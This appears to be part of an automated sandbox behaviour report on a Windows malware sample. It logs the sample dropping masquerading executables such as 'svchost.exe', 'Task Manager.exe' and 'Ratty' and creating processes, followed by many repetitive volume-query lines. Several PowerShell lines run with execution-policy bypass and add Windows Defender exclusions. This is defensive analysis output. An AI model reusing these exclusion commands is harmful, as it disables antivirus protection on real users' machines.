Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Process created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd" Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Process created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Process created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Process created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Queries volume information: C:\Users\user\Desktop\dLRcE11Dkl.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Queries volume information: C:\Users\user\AppData\Roaming\All function.cmd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Queries volume information: C:\Users\user\AppData\Roaming\Task Manager.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Queries volume information: C:\Users\user\AppData\Roaming\All function.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Queries volume information: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
